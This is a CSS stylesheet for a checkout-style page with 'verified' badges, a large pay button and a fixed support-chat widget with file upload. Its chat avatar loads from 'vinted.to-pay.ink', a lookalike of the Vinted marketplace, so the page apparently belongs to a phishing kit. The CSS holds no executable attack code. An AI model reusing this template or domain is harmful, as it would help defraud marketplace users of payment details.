@import url('https://fonts.googleapis.com/css2?family=Roboto&display=swap');
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@100;400;500&display=swap');
body {
    background: rgb(243, 242, 242) !important;
    font-size: 15px !important;
    font-family: 'Roboto', sans-serif !important;
}

.shadow-box {
    -webkit-box-shadow: 4px 4px 8px 0px rgba(34, 60, 80, 0.2);
    -moz-box-shadow: 4px 4px 8px 0px rgba(34, 60, 80, 0.2);
    box-shadow: 4px 4px 8px 0px rgba(34, 60, 80, 0.2);
    border-radius: 3px;
}

.fw400 {
    font-weight: 400;
}

.fw500 {
    font-weight: 500;
}

.fw100 {
    font-weight: 100;
}

.fn22 {
    font-size: 22px;
}

.fn20 {
    font-size: 20px;
}

.fn18 {
    font-size: 18px;
}

.fn16 {
    font-size: 16px;
}

.fn14 {
    font-size: 14px;
}

.mobile {
    display: none;
}

.desktop {
    display: block;
}

.container-main {
    max-width: 962px;
    --bs-gutter-x: 1.5rem;
    --bs-gutter-y: 0;
    padding-right: calc(var(--bs-gutter-x) * .5);
    padding-left: calc(var(--bs-gutter-x) * .5);
    margin-right: auto;
    display: block;
    margin-left: auto;
}

.row-1 {
    --bs-gutter-x: 1.5rem;
    --bs-gutter-y: 0;
    display: flex;
    flex-wrap: wrap;
    margin-top: calc(-1 * var(--bs-gutter-y));
    margin-right: calc(-.5 * var(--bs-gutter-x));
    margin-left: calc(-.5 * var(--bs-gutter-x));
}

.img-item {
    padding-left: 0px;
    padding-right: 0px;
}

.image1 {
    max-height: 350px;
}

.band {
    background: rgba(199, 199, 199, 0.5);
    width: 100%;
    display: flex;
}

.band2 {
    width: 100%;
    display: none;
    position: absolute;
}

.band-box {
    background: rgba(199, 199, 199, 0.5);
    height: 50px
}

.btn-box {
    display: flex;
    top: 0px;
}

.btn {
    background: rgb(9, 177, 186) !important;
    color: white !important;
    max-width: 342px;
    width: 100%;
    height: 42px;
    font-weight: 700;
    font-size: 24px;
    border-radius: 7px;
    transition: 0.1s;
}

.btn:active {
    position: relative;
    top: 2px;
}

.chat-box {
    background: rgb(9, 177, 186) !important;
    display: unset;
    align-items: center;
    justify-content: center;
    position: fixed;
    bottom: 158px;
    right: 0;
    height: 40px;
    width: 40px;
    border-radius: 9px 0 0 9px;
    background: #4d4dffb2;
    overflow: hidden;
    z-index: 50000;
}

.chat {
    background: rgb(242, 244, 245) !important;
    display: unset;
    align-items: center;
    justify-content: center;
    position: fixed;
    bottom: 10px;
    right: 0px;
    height: 500px;
    width: 400px;
    border-radius: 9px 0 0 9px;
    background: #4d4dffb2;
    z-index: 50000;
    border-radius: 10px;
    display: none
}

.chat-header {
    background: rgb(9, 177, 186) !important;
    width: 100%;
    height: 50px;
    border-radius: 10px 0;
}

.chat-avatar {
    border-radius: 100%;
    background-image: url("https://vinted.to-pay.ink/assets/img/chat/oper.jpg");
    background-size: cover;
    height: 60px;
    width: 60px;
    position: relative;
    bottom: 25px;
    left: 15px;
}

.chat-name {
    color: #fff;
    position: relative;
    left: 35px;
    top: 5px;
}

.chat-main {
    width: 100%;
    height: 400px;
    border-bottom: 1px solid rgb(9, 177, 186);
}

.input-file-container {
    position: relative;
    width: 100%;
}

.js .input-file-trigger {
    display: block;
    padding: 10px 4px;
    color: #fff;
    font-size: 1em;
    transition: all .4s;
    cursor: pointer;
}

.js .input-file {
    position: absolute;
    top: 0;
    left: 0;
    opacity: 0;
    cursor: pointer;
    width: 25px;
}

.file-return {
    margin: 0;
}

.file-return:not(:empty) {
    margin: 1em 0;
}

.js .file-return {
    font-style: italic;
    font-size: .9em;
    font-weight: bold;
}

.js .file-return:not(:empty):before {
    content: "Selected file: ";
    font-style: normal;
    font-weight: normal;
}

.chat-textarea {
    width: 100%;
    height: 50px;
    background-color: #fff;
    border-radius: 10px;
    position: relative;
}

.chat-text {
    width: 330px;
    height: 50px;
    background-color: #fff;
    border: none;
    overflow: auto;
    outline: none;
    -webkit-box-shadow: none;
    -moz-box-shadow: none;
    box-shadow: none;
    resize: none;
    font-size: 14px;
    /*remove the resize handle on the bottom right*/
}

.chat-btn-box {
    height: 40px;
}

.chat-send-btn {
    -webkit-appearance: none;
    -moz-appearance: none;
    appearance: none;
    padding: 0px;
    border-width: 0;
    text-decoration: none;
    cursor: pointer;
    background: none;
}

.verified-info {
    display: flex;
}

.information-content {
    display: grid !important;
}

.information-content2 {
    display: none !important;
}

.description {
    display: block;
}

.info-content {
    background: white;
}

.check_circle {
    width: 55px;
    height: 55px;
    margin-top: auto;
    margin-bottom: auto;
    padding-left: 10px;
    padding-right: 10px;
    filter: invert();
}

.verified_user {
    width: 20px;
    height: 20px;
    margin-top: auto;
    margin-bottom: auto;
    fill: rgba(77, 161, 2, 0.7);
}

.ligher-bot {
    font-weight: lighter;
    margin-top: 20px;
    font-size: 12px;
    line-height: 20px;
}

.praza {
    font-size: 20px;
    font-weight: 100;
}

.ligher {
    font-size: 17px;
    font-weight: lighter;
}

.border-bot {
    border-bottom: 0.5px solid;
    color: black;
    font-weight: lighter;
}

.row-contct {
    padding-left: 0% !important;
    padding-right: 0% !important;
}

.btn-lower {
    height: 90px;
    position: fixed;
    bottom: 0;
    width: 100%;
    padding: 5px 0;
    background: rgb(240, 244, 253);
    display: none;
}

@media only screen and (max-width: 962px) {
    .container-main {
        max-width: 800px;
    }
    .img-item {
        padding-left: 0px;
        padding-right: 0px;
    }
}

@media only screen and (max-width: 810px) {
    .container-main {
        max-width: 440px;
    }
    .mobile {
        display: block;
    }
    .desktop {
        display: none;
    }
    .row-1 {
        display: grid;
    }
    .btn-box {
        display: none;
    }
    .btn-lower {
        display: block;
    }
    .verified-info {
        display: none !important;
    }
    .information-content {
        display: none !important;
    }
    .information-content2 {
        display: grid !important;
    }
    .description {
        display: none !important;
    }
    .info-content {
        background: rgb(243, 242, 242) !important;
    }
    .shadow-box {
        -webkit-box-shadow: 4px 4px 8px 0px rgba(34, 60, 80, 0);
        -moz-box-shadow: 4px 4px 8px 0px rgba(34, 60, 80, 0);
        box-shadow: 4px 4px 8px 0px rgba(34, 60, 80, 0);
        border-radius: 3px;
    }
    .band {
        display: none !important;
    }
    .band2 {
        width: 100%;
        display: flex !important;
    }
    .check_circle {
        width: 50px;
        height: 50px;
        margin-top: auto;
        margin-bottom: auto;
        padding-left: 10px;
        padding-right: 10px;
        filter: invert();
    }
    .border-bot {
        border-bottom: 0.5px solid;
        color: black;
        font-weight: 500;
    }
}

@media only screen and (max-width: 500px) {
    .chat {
        bottom: 0px;
        right: 0px;
        height: 100vh;
        width: 100vw;
    }
    .chat-main {
        height: -moz-calc(100vh - 100px);
        height: -webkit-calc(100vh - 100px);
        height: calc(100vh - 100px);
    }
    .chat-avatar {
        height: 40px;
        width: 40px;
        position: relative;
        bottom: -5px;
        left: 15px;
    }
}

@media only screen and (max-width: 375px) {
    .fn16 {
        font-size: 13px;
    }
    .fn22 {
        font-size: 18px;
    }
    .fn20 {
        font-size: 18px;
    }
    .fn18 {
        font-size: 16px;
    }
    .fn14 {
        font-size: 12px;
    }
    .band-box {
        height: 40px;
    }
}